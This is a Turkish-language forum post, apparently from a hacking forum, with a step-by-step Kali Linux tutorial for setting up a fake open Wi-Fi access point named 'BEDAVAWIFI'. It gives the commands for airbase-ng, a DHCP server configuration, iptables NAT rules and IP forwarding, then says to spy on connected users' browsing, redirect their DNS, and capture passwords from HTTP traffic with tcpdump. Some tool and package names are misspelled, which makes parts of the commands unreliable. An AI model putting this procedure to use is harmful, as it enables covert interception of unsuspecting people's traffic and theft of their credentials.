Kali Linux İşletim Sistemi Araçlarını Kullanarak Sahte Kablosuz Ağ Oluşturma

Rıdvankaya

Uzman Üye
Web sitesi
github.com
Kali Linux İşletim Sistemi Araçlarını Kullanarak Sahte Kablosuz Ağ Oluşturma
Aşağıdaki işlem adımlarına göre Kali içindeki airdump-ng, dhcp3-server, airbase-ng araçlarını kullanıp, sahte bir kablosuz ağ oluşturarak gerekli ayarları yapınız.
1. Adım: Kali Linux’a ilgili adaptör bağlantısını yaptıktan sonra iwconfig komutu ile arabirimleri görünüz.
2. Adım: Komut satırına sudo airmong-ng start wlan0 yazarak ağ arabirim kartını monitör moda geçiriniz.
3. Adım: Komut satırına sudo airodump-ng wlan0 yazarak etraftaki kablosuz erişim noktalarını keşfediniz.
4. Adım: Komut satırına sudo apt-get install dhcp3-server yazarak DHCP Server’i yükleyiniz.
5. Adım: DHCP Server yüklenmediyse dosyayı internetten indirip, sudo tar -xvf isc-dhcp-server. tar.gz yazarak yükleyiniz.
6. Adım: Komut satırına dpkg -i isc.dhcp.server.dep yazarak ilgili paketleri yükleyiniz.
7. Adım: Komut satırına reboot yazarak sistemi yeniden başlatınız. İlgili .dep paketini sisteminize yükledikten sonra Kali’yi yeniden başlatınız.
8. Adım: IP aralığı verebilmek için DHCP servisinin conf dosyasını aşağıdaki gibi düzenleyiniz.
nano /etc/dhcp3/dhcpd.conf
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}
9. Adım: Komut satırına airbase-ng -e BEDAVAWIFI -c 11 -v wlan0 yazarak BEDAVAWIFI isimli
sahte kablosuz ağı oluşturunuz.
10. Adım: at0 adında sanal arabirim eklemek için aşağıdaki kod satırlarını yazınız.
ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0
11. Adım: Komut satırına route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 yazarak sahte kablosuz ağ için router ayarlarını yapınız.
12. Adım: Sahte kablosuz ağ için iptable ayarlarını aşağıdaki komut satırlarını yazarak oluşturunuz.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
13. Adım: Komut satırına iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE yazarak
sahte kablosuz ağa gelecek bağlantıların yönlendirilmesini sağlayınız.
14. Adım: Komut satırına dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 & yazarak DHCP servisini başlatınız.
15. Adım: Komut satırına echo “1” > /proc/sys/net/ipv4/ip_forward yazarak gelecek IP’leri
yönlendiriniz.
16. Adım: Bu işlemlerden sonra BEDAVAWIFI isimli sahte kablosuz ağ çalışmaya başlamıştır. Oluşturulan bu sahte kablosuz ağ sayesinde ağa bağlanan cihazların hangi IP
numarasını alıp internette hangi sayfalara gittiğine, dnschef ile dns yönlendirmesi yaparak bakınız
veya tcpdump ile HTTP trafiğinde parola bilgilerini görünüz.